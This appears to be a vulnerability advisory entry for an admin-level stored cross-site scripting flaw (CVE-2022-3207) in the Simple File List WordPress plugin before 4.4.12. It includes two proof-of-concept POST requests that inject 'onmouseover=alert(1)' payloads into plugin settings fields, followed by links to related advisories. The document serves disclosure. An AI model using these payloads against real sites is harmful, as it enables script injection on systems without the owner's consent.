Lucene search
Raad Haddad of Cloudyrion GmbHWPEX-ID:B57272EA-9A8A-482A-BBAA-5F202CA5B9AAHistorySep 19, 2022 - 12:00 a.m.
Simple File List < 4.4.12 - Admin+ Stored Cross-Site Scripting
2022-09-1900:00:00
Raad Haddad of Cloudyrion GmbH
66
0.001 Low
EPSS
Percentile
25.0%
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
# First Stored XSS - HTTP Request
POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=email_settings HTTP/1.1
Host: target
...
...
eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Demail_settings&eeNotifyTo=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyCc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyBcc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFrom=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFromName=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifySubject=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyMessage=Greetings%2C%0D%0A%0D%0AYou+should+know+that+a+file+has+been+uploaded+to+your+website.%0D%0A%0D%0A%5Bfile-list%5D%0D%0A%0D%0AFile+List%3A+%5Bweb-page%5D&submit=SAVE
+++++++++++++++++++++++
# Second Stored XSS - HTTP Request
POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=list_settings HTTP/1.1
Host: target
...
...
eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Dlist_settings&eeShowList=YES&eeSortBy=DateMod&eeSortOrder=Descending&eeGenerateImgThumbs=YES&eeShowFileThumb=YES&eeLabelThumb=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeLabelName=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileDate=YES&eeLabelDate=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileSize=YES&eeLabelSize=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowHeader=YES&eeSmoothScroll=YES&eeShowFileDescription=YES&eeShowFileExtension=YES&eeShowFileActions=YES&eeShowFileOpen=YES&eeShowFileDownload=YES&eeShowFileCopyLink=YES&submit=SAVERelated
patchstack
patchstack
wpvulndb
wpvulndb
Simple File List < 4.4.12 - Admin+ Stored Cross-Site Scripting
2022-09-19 00:00:00
prion
prion
Cross site scripting
2022-10-10 21:15:00
cvelist
cvelist
CVE-2022-3207 Simple File List < 4.4.12 - Admin+ Stored Cross-Site Scripting
2022-10-10 00:00:00
cnvd
cnvd
WordPress Simple File List Cross-Site Scripting Vulnerability
2022-10-12 00:00:00
nvd
nvd
CVE-2022-3207
2022-10-10 21:15:11
cve
cve
CVE-2022-3207
2022-10-10 21:15:11